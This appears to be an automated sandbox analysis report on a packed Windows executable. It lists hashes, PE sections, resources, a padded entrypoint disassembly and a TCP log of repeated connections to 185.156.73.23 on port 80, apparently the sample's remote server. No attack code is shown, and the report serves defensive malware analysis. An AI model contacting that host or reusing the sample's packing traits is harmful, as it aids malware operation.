Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....R..............................................................................................................................................................................................................................................................................................................................................P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94324154252622
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WwVs3PavPg.exe
File size:	1'928'704 bytes
MD5:	4e341a5e65522dc7ad83bab52f3e60f8
SHA1:	d3a1d76710068d38cd35ed908c0677263f5d97e9
SHA256:	9afad313fdb3a41015ec415280986b4d596b1dc07bcc46b49f5bee6fcf5fb54c
SHA512:	27c41edded8e29f87be28bb93e86ae26129f28a63134235fa38493909bef08b2559b0da1bd03c4e2856b7cc6dbd2174650e7e3634f015e9f600f25bab4a4d3ac
SSDEEP:	49152:rTMq5MIQ0Tqibh61R5agdp707srnnouWcbxdt+ogki:nMq5M3iwR5agdiSnnoybbt+J
TLSH:	C09533297416467FCC158CB7285AC92D37FE5B1F47A717B7723B8AB42E1368223A8D04
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

File Icon


Icon Hash:	e7a99a8a8651790c

Static PE Info

General

Entrypoint:	0xc57000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F73F904C69Ah
cmovl ebx, dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x41805b	0x6f	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40d000	0xaea0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x84e85c	0x18	bpztmzrt
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x40c000	0x24e00	94b1a2190b78ea1c4be42b4f1a4079aa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x40d000	0xaea0	0x7000	2d905b5f4a89b5173fc66948acd6fe12	False	0.9674246651785714	data	7.897713017599938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x418000	0x1000	0x200	b8539b83d0b3f253ed2a56b71af0554b	False	0.154296875	data	1.085758102617974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x419000	0x295000	0x200	9f5987cd031246bdcf53b463064e2bf1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bpztmzrt	0x6ae000	0x1a8000	0x1a7600	d786653c436486ef58da9af559e5aa5e	False	0.990158833407145	OpenPGP Public Key	7.949254049589531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
skyqimte	0x856000	0x1000	0x400	87c57e8886e244c95c2dca738b67ef60	False	0.8076171875	data	6.281029401180309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x857000	0x3000	0x2200	8912133fc0c588e0555425b45c201e78	False	0.060546875	DOS executable (COM)	0.7647001010052188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x84e8bc	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.7971748400852878
RT_ICON	0x84f764	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.7838447653429603
RT_ICON	0x85000c	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7200460829493087
RT_ICON	0x8506d4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.740606936416185
RT_ICON	0x850c3c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.6840248962655602
RT_ICON	0x8531e4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.7345215759849906
RT_ICON	0x85428c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.7622950819672131
RT_ICON	0x854c14	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8111702127659575
RT_STRING	0x413c80	0x330	data			0.8357843137254902
RT_STRING	0x413fb0	0x170	data			0.15
RT_STRING	0x414120	0x620	empty			0
RT_STRING	0x414740	0x762	empty			0
RT_STRING	0x414ea4	0x852	empty			0
RT_STRING	0x4156f8	0x726	empty			0
RT_STRING	0x415e20	0x658	empty			0
RT_STRING	0x416478	0x6c0	empty			0
RT_STRING	0x416b38	0x638	empty			0
RT_STRING	0x417170	0x88a	empty			0
RT_ACCELERATOR	0x4179fc	0x20	empty			0
RT_GROUP_ICON	0x85507c	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x8550f2	0x1b4	data			0.5711009174311926
RT_MANIFEST	0x8552a6	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 17:32:38.848089933 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:38.967744112 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:38.967853069 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:38.968837023 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:39.088599920 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:40.347254992 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:40.347345114 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:40.461878061 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:40.581545115 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:40.932085991 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:40.932146072 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:40.938939095 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.058578014 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499490976 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499562025 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499599934 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499655962 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499655962 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499655962 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499798059 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499851942 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499857903 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499887943 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499917984 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499923944 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.499938011 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.499958992 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.500025988 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.500025988 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.500560045 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.500614882 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.507788897 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.507925034 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.507930994 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.507997036 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.517098904 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.517168045 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.620208025 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.620481014 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.691517115 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.691608906 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.691625118 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.691653013 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.695363998 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.695466995 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.697005987 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.697123051 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.697191000 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.697191000 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.704998016 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.705137968 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.705223083 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.705293894 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.712970972 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.713052034 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.713084936 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.713171005 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.721035957 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.721157074 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.721299887 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.721299887 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.729173899 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.729232073 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.729280949 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.729280949 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.736999989 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.737059116 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.737144947 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.737282038 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.745074034 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.745178938 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.745243073 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.745244026 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.753071070 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.753139973 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.753603935 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.753603935 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.761122942 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.761209011 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.761229038 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.761630058 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.768151045 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.768255949 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.768333912 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.768416882 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.775145054 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.775233030 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.775259972 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.775336981 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.883436918 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.883455038 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.883533955 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.883533955 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.884741068 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.884836912 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.884845972 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.884938955 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.889514923 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.889552116 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.889581919 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.889610052 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.894268990 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.894344091 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.894375086 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.894375086 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.898833036 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.898910999 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.898941994 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.899163961 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.903284073 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.903342009 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.903347015 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.903417110 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.907891989 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.907947063 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.908077955 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.908077955 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.912173986 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.912210941 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.912266970 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.912498951 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.916559935 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.916618109 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.916627884 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.916666031 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.920851946 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.920927048 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.921001911 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.921001911 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.925213099 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.925273895 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.925280094 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.925345898 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.929519892 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.929596901 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.929617882 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.929666042 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.934601068 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.934623957 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.934743881 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.934743881 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.938254118 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.938283920 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.938338041 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.938358068 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.942502022 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.942671061 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.943011045 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.943011045 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.946897984 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.946963072 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.948879004 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.948879004 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.951179981 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.951262951 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.952874899 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.952874899 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.955540895 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.955610037 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.956876993 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.956876993 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.960000038 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.960086107 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.960880041 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.964232922 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.964354992 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.964881897 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.964881897 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.969063044 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.969152927 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.969644070 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.969644070 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.972867012 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.972930908 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:41.972980022 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:41.972980022 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:42.075368881 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:42.076971054 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:42.097110033 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:42.217112064 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:42.613701105 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:42.616388083 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:44.637545109 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:44.757131100 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:45.178992033 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:45.180003881 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:47.200162888 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:47.319854975 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:48.051527977 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:48.051656961 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:50.075073004 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:50.194781065 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:50.602869987 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:50.603116035 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:52.622360945 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:52.741947889 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:53.155826092 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:53.155966997 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:55.168915033 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:55.288755894 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:55.704657078 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:55.704787970 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:57.715581894 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:32:57.835510969 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:58.269696951 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:32:58.269831896 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.465961933 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.466309071 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.585961103 CET	80	49843	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:00.586090088 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.586260080 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.586421967 CET	80	49792	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:00.586515903 CET	49792	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:00.705862045 CET	80	49843	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:02.022774935 CET	80	49843	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:02.022911072 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.112065077 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.112379074 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.231863022 CET	80	49849	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:04.231945038 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.231973886 CET	80	49843	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:04.232044935 CET	49843	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.237968922 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:04.357615948 CET	80	49849	185.156.73.23	192.168.2.6
